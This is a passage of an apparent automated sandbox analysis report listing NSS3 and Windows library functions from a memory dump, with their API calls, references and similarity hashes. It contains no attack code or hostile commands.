Instruction Fuzzy Hash: 0511E979A00204AFEB00EF24DC48E963778EF49368F158564ED1997712DB31ED55CBE1

Function 6C5FECB0 Relevance: 6.1, APIs: 4, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6C5FF0AD,6C5FF150,?,6C5FF150,?,?,?), ref: 6C5FECBA

Part of subcall function 6C600FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C5A87ED,00000800,6C59EF74,00000000), ref: 6C601000
Part of subcall function 6C600FF0: PR_NewLock.NSS3(?,00000800,6C59EF74,00000000), ref: 6C601016
Part of subcall function 6C600FF0: PL_InitArenaPool.NSS3(00000000,security,6C5A87ED,00000008,?,00000800,6C59EF74,00000000), ref: 6C60102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6C5FECD1

Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C6010F3
Part of subcall function 6C6010C0: EnterCriticalSection.KERNEL32(?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60110C
Part of subcall function 6C6010C0: PL_ArenaAllocate.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601141
Part of subcall function 6C6010C0: PR_Unlock.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601182
Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60119C

PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6C5FED02

Part of subcall function 6C6010C0: PL_ArenaAllocate.NSS3(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60116E

PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6C5FED5A

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
String ID:
API String ID: 2957673229-0
Opcode ID: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
Instruction ID: d6599264f289043b28da02cc21a0798c768c21d5195a97c96a0bc3a8f17e161e
Opcode Fuzzy Hash: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
Instruction Fuzzy Hash: 4921D4B1A007429BE704CF25DD44B52B7E5BFE5308F15C219E81CC7A62EBB0E595CAE4

Function 6C62EDB0 Relevance: 6.1, APIs: 4, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,6C617FFA,?,6C619767,?,8B7874C0,0000A48E), ref: 6C62EDD4
realloc.MOZGLUE(C7C1920F,?,00000000,00000000,6C617FFA,?,6C619767,?,8B7874C0,0000A48E), ref: 6C62EDFD
PORT_Alloc_Util.NSS3(?,00000000,00000000,6C617FFA,?,6C619767,?,8B7874C0,0000A48E), ref: 6C62EE14

Part of subcall function 6C600BE0: malloc.MOZGLUE(6C5F8D2D,?,00000000,?), ref: 6C600BF8
Part of subcall function 6C600BE0: TlsGetValue.KERNEL32(6C5F8D2D,?,00000000,?), ref: 6C600C15

memcpy.VCRUNTIME140(?,?,6C619767,00000000,00000000,6C617FFA,?,6C619767,?,8B7874C0,0000A48E), ref: 6C62EE33

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Alloc_ErrorUtilValuemallocmemcpyrealloc
String ID:
API String ID: 3903481028-0
Opcode ID: ab9cb24c4eb5351f171bcce45f3e3395d7a22f946f2e3105262bd9d309c6612f
Instruction ID: e8f851b8a9b99a6262b708de0fb0ce716457e3836dd44d9e0a811891a100749a
Opcode Fuzzy Hash: ab9cb24c4eb5351f171bcce45f3e3395d7a22f946f2e3105262bd9d309c6612f
Instruction Fuzzy Hash: D411C2B1A00706ABEB109E75DC84B46B3A8EF0035EF244531E91996A00E339F465CFE9

Function 6C5C8DD0 Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C5C8DE7
EnterCriticalSection.KERNEL32 ref: 6C5C8DFC
PR_Unlock.NSS3 ref: 6C5C8E2D
PR_SetError.NSS3 ref: 6C5C8E49

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID:
API String ID: 284873373-0
Opcode ID: e0cf06219f758a77fe7b74d5378635e4f0887b2ac3039460d9311d2728b6d687
Instruction ID: 427bc660176d113be4b1ab97ca93bd9aa024f79b9ba54bd4cf00148a71927a92
Opcode Fuzzy Hash: e0cf06219f758a77fe7b74d5378635e4f0887b2ac3039460d9311d2728b6d687
Instruction Fuzzy Hash: F2114F756056149BD700AF78D88855ABBF4FF45314F014969DC89D7B00EB30E854CBD6

Function 6C64AC70 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6C635F17,?,?,?,?,?,?,?,?,6C63AAD4), ref: 6C64AC94
PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6C635F17,?,?,?,?,?,?,?,?,6C63AAD4), ref: 6C64ACA6
free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6C63AAD4), ref: 6C64ACC0
free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6C63AAD4), ref: 6C64ACDB

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: free$DestroyFreeK11_Monitor
String ID:
API String ID: 3989322779-0
Opcode ID: da4238b9d64404980aa5fca4bc64cb57a887b64ec66fefeef79b44afcef67702
Instruction ID: 7c091ae0ee5e7b9a0a51fda39daf0d9e3888cdd169cf19a48ec5b55bc23c40c2
Opcode Fuzzy Hash: da4238b9d64404980aa5fca4bc64cb57a887b64ec66fefeef79b44afcef67702
Instruction Fuzzy Hash: B3018CB1601B01ABEB60DF2AE908743B7E8BF00799B008839D85AC3E00E731F414CBD4

Function 6C5B1DD0 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

CERT_DestroyCertificate.NSS3(?), ref: 6C5B1DFB

Part of subcall function 6C5A95B0: TlsGetValue.KERNEL32(00000000,?,6C5C00D2,00000000), ref: 6C5A95D2
Part of subcall function 6C5A95B0: EnterCriticalSection.KERNEL32(?,?,?,6C5C00D2,00000000), ref: 6C5A95E7
Part of subcall function 6C5A95B0: PR_Unlock.NSS3(?,?,?,?,6C5C00D2,00000000), ref: 6C5A9605

PR_EnterMonitor.NSS3 ref: 6C5B1E09

Part of subcall function 6C669090: TlsGetValue.KERNEL32 ref: 6C6690AB
Part of subcall function 6C669090: TlsGetValue.KERNEL32 ref: 6C6690C9
Part of subcall function 6C669090: EnterCriticalSection.KERNEL32 ref: 6C6690E5
Part of subcall function 6C669090: TlsGetValue.KERNEL32 ref: 6C669116
Part of subcall function 6C669090: LeaveCriticalSection.KERNEL32 ref: 6C66913F

Part of subcall function 6C5AE190: PR_EnterMonitor.NSS3(?,?,6C5AE175), ref: 6C5AE19C
Part of subcall function 6C5AE190: PR_EnterMonitor.NSS3(6C5AE175), ref: 6C5AE1AA
Part of subcall function 6C5AE190: PR_ExitMonitor.NSS3 ref: 6C5AE208
Part of subcall function 6C5AE190: PL_HashTableRemove.NSS3(?), ref: 6C5AE219
Part of subcall function 6C5AE190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C5AE231
Part of subcall function 6C5AE190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C5AE249
Part of subcall function 6C5AE190: PR_ExitMonitor.NSS3 ref: 6C5AE257

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5B1E37
PR_ExitMonitor.NSS3 ref: 6C5B1E4A

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Monitor$Enter$Value$CriticalExitSection$Arena_FreeUtil$CertificateDestroyErrorHashLeaveRemoveTableUnlock
String ID:
API String ID: 499896158-0
Opcode ID: 79226e0484e761aa869166de52321e7e43b47d72e99aab51116cd9c6a9ae8bfa
Instruction ID: b9e03bcfac2fad2cf993df5534e29a73ecdd5054b16b35a23c20f0897eea4378
Opcode Fuzzy Hash: 79226e0484e761aa869166de52321e7e43b47d72e99aab51116cd9c6a9ae8bfa
Instruction Fuzzy Hash: 5B018FB1B0015097EB409F6AEC14F477FA4AB42B5CF204035F919ABB91EB71E824CBD6

Function 6C5B1D50 Relevance: 6.0, APIs: 4, Instructions: 47memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5B1D75
PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C5B1D89
PORT_ZAlloc_Util.NSS3(00000010), ref: 6C5B1D9C
free.MOZGLUE(00000000), ref: 6C5B1DB8

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Alloc_Util$Errorfree
String ID:
API String ID: 939066016-0
Opcode ID: 53fc1d05d2f8a9d646cdf1f150705ae0733145b06447502a20a99cc3ef4ae9de
Instruction ID: 0ffe59e38de1b28551a35b86de10bb73f1a046dcd243d86cadc1f0daa5662ca3
Opcode Fuzzy Hash: 53fc1d05d2f8a9d646cdf1f150705ae0733145b06447502a20a99cc3ef4ae9de
Instruction Fuzzy Hash: 93F0F9B26012105BFB505F5A6C51B573A989B81798F100635DD1967B44DA71E40482E5

Function 6C5FFD80 Relevance: 6.0, APIs: 4, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6C5A9003,?), ref: 6C5FFD91

Part of subcall function 6C600BE0: malloc.MOZGLUE(6C5F8D2D,?,00000000,?), ref: 6C600BF8
Part of subcall function 6C600BE0: TlsGetValue.KERNEL32(6C5F8D2D,?,00000000,?), ref: 6C600C15

PORT_Alloc_Util.NSS3(A4686C60,?), ref: 6C5FFDA2
memcpy.VCRUNTIME140(00000000,12D068C3,A4686C60,?,?), ref: 6C5FFDC4
free.MOZGLUE(00000000,?,?), ref: 6C5FFDD1

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Alloc_Util$Valuefreemallocmemcpy
String ID:
API String ID: 2335489644-0
Opcode ID: a840b4197c07c4a05d5bba91eb8bbaf2a038d4ba1889cee93ac965cec24704c2
Instruction ID: 0c9be5deb42ab95cbec44f049cc54c176b85d563340cc3e97138d2e83e02389e
Opcode Fuzzy Hash: a840b4197c07c4a05d5bba91eb8bbaf2a038d4ba1889cee93ac965cec24704c2
Instruction Fuzzy Hash: 7EF04CF16012026BEB085F55DC8081B77D8EF41298B108174ED19CBF05E721D815CBF5

Function 6C6BCC50 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(?), ref: 6C6BCC61
free.MOZGLUE ref: 6C6BCC6E
DeleteCriticalSection.KERNEL32(?), ref: 6C6BCC80
free.MOZGLUE(?), ref: 6C6BCC87

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: CriticalDeleteSectionfree
String ID:
API String ID: 2988086103-0
Opcode ID: 7c26cb2a911d8512b96fe3bddf0719fb9a78edcde20dc1c6b987409b2b2e9bd6
Instruction ID: 231bf203378c048ad9c88c4ca07a0d0175373311adec6c00c8daa08650283bc8
Opcode Fuzzy Hash: 7c26cb2a911d8512b96fe3bddf0719fb9a78edcde20dc1c6b987409b2b2e9bd6
Instruction Fuzzy Hash: DCE06576700609AFCB10EFA9DC84C8777BCEE492707150525E692C3740D232F915CBE5

Function 6C599DC0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 220COMMON

Download Yara Rule

APIs

sqlite3_value_text.NSS3 ref: 6C599E1F

Part of subcall function 6C5513C0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,6C522352,?,00000000,?,?), ref: 6C551413
Part of subcall function 6C5513C0: memcpy.VCRUNTIME140(00000000,R#Rl,00000002,?,?,?,?,6C522352,?,00000000,?,?), ref: 6C5514C0

Strings

ESCAPE expression must be a single character, xrefs: 6C599F78
LIKE or GLOB pattern too complex, xrefs: 6C59A006

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: memcpysqlite3_value_textstrlen
String ID: ESCAPE expression must be a single character$LIKE or GLOB pattern too complex
API String ID: 2453365862-264706735
Opcode ID: eb6e106172c330160b6ebce866e6acc30575bd53b5c70f47a60a290865f69856
Instruction ID: 71af588d8aafcc9854115d6e99288fea5fad891a2ab03dbc00b45a9fae08b7ca
Opcode Fuzzy Hash: eb6e106172c330160b6ebce866e6acc30575bd53b5c70f47a60a290865f69856
Instruction Fuzzy Hash: 69811E74A042958FDB01CF29C8803A9B7F2AF85318F2886D9D8AD8BB81D735DC46C791

Function 6C5F4D10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000), ref: 6C5F4D57
PR_snprintf.NSS3(?,00000008,%d.%d,?,?), ref: 6C5F4DE6

Strings

%d.%d, xrefs: 6C5F4DDE

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: ErrorR_snprintf
String ID: %d.%d
API String ID: 2298970422-3954714993
Opcode ID: 8580b573f91508c8aa804e0f1c23fa68d82c9d11da3fb833f415b69bfe46178c
Instruction ID: 0af4fa407b9152389b20cdcb8594932dd8538674af7f57a679d4a50d2474e2da
Opcode Fuzzy Hash: 8580b573f91508c8aa804e0f1c23fa68d82c9d11da3fb833f415b69bfe46178c
Instruction Fuzzy Hash: F931ECB2D042196BEB149BA19C05BFF7768DF81308F050469ED259B782EB309906CFB6

Function 6C614CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

SECOID_FindOIDByTag_Util.NSS3('8al,00000000,00000000,?,?,6C613827,?,00000000), ref: 6C614D0A

Part of subcall function 6C600840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6008B4

SECITEM_ItemsAreEqual_Util.NSS3(00000000,00000000,00000000), ref: 6C614D22

Part of subcall function 6C5FFD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6C5A1A3E,00000048,00000054), ref: 6C5FFD56

Strings

'8al, xrefs: 6C614D07

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Util$Equal_ErrorFindItemsTag_memcmp
String ID: '8al
API String ID: 1521942269-238783270
Opcode ID: 14028aa1c084b1134f31e0fe545c68cf4cce508ec734b29011f619df16d7203e
Instruction ID: 9d353dcc8acc3db5173c242aaa3963e4e988034de41432e4b318d05e0bbaabfe
Opcode Fuzzy Hash: 14028aa1c084b1134f31e0fe545c68cf4cce508ec734b29011f619df16d7203e
Instruction Fuzzy Hash: B6F06872A1512467DF104E6E9C40B5336DC9B417BEF180271DD28CBF81E6A1CC01C6A6

Function 6C63AF70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

PR_GetUniqueIdentity.NSS3(SSL), ref: 6C63AF78

Part of subcall function 6C59ACC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C59ACE2
Part of subcall function 6C59ACC0: malloc.MOZGLUE(00000001), ref: 6C59ACEC
Part of subcall function 6C59ACC0: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C59AD02
Part of subcall function 6C59ACC0: TlsGetValue.KERNEL32 ref: 6C59AD3C
Part of subcall function 6C59ACC0: calloc.MOZGLUE(00000001,?), ref: 6C59AD8C
Part of subcall function 6C59ACC0: PR_Unlock.NSS3 ref: 6C59ADC0
Part of subcall function 6C59ACC0: PR_Unlock.NSS3 ref: 6C59AE8C
Part of subcall function 6C59ACC0: free.MOZGLUE(?), ref: 6C59AEAB

memcpy.VCRUNTIME140(6C703084,6C7002AC,00000090), ref: 6C63AF94

Strings

SSL, xrefs: 6C63AF73

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Unlock$IdentityUniqueValuecallocfreemallocmemcpystrcpystrlen
String ID: SSL
API String ID: 2424436289-2135378647
Opcode ID: 6d85f480c1fb907ba3419f4314d478704ed9acf0c98b89c8f407ebb10d81b10c
Instruction ID: a33506571db8ac6a0d3eb131f43bb43c8e192ea4b6354680a524dd25601bd026
Opcode Fuzzy Hash: 6d85f480c1fb907ba3419f4314d478704ed9acf0c98b89c8f407ebb10d81b10c
Instruction Fuzzy Hash: 67214DF2716E68AEDB00DF529543B127AB2B742308710722DD11E4BB2ADB3180089FDD

Function 6C590F00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

PR_GetPageSize.NSS3(6C590936,FFFFE8AE,?,6C5216B7,00000000,?,6C590936,00000000,?,6C52204A), ref: 6C590F1B

Part of subcall function 6C591370: GetSystemInfo.KERNEL32(?,?,?,?,6C590936,?,6C590F20,6C590936,FFFFE8AE,?,6C5216B7,00000000,?,6C590936,00000000), ref: 6C59138F

PR_NewLogModule.NSS3(clock,6C590936,FFFFE8AE,?,6C5216B7,00000000,?,6C590936,00000000,?,6C52204A), ref: 6C590F25

Part of subcall function 6C591110: calloc.MOZGLUE(00000001,0000000C,?,?,?,?,?,?,?,?,?,?,6C590936,00000001,00000040), ref: 6C591130
Part of subcall function 6C591110: strdup.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,6C590936,00000001,00000040), ref: 6C591142
Part of subcall function 6C591110: PR_GetEnvSecure.NSS3(NSPR_LOG_MODULES,?,?,?,?,?,?,?,?,?,?,?,?,?,6C590936,00000001), ref: 6C591167

Strings

clock, xrefs: 6C590F20

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: InfoModulePageSecureSizeSystemcallocstrdup
String ID: clock
API String ID: 536403800-3195780754
Opcode ID: 2a3a27f644cece9bb53de8dfaf3ad051f304dfd841dff1168e993b530d0a04b0
Instruction ID: 0b61935176a35e588df3ce3fab1667946df6675fa10aaa7a02392f3fac3405ab
Opcode Fuzzy Hash: 2a3a27f644cece9bb53de8dfaf3ad051f304dfd841dff1168e993b530d0a04b0
Instruction Fuzzy Hash: A1D022B27043A8B2C50022979C44F97B3BCC7C32B9F0088BAE00841D104FA454DAD369

Function 6C600DB0 Relevance: 5.1, APIs: 4, Instructions: 97COMMON

Download Yara Rule

APIs

calloc.MOZGLUE ref: 6C600DF5
TlsGetValue.KERNEL32 ref: 6C600E2D
TlsGetValue.KERNEL32 ref: 6C600E58
TlsGetValue.KERNEL32 ref: 6C600E84

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

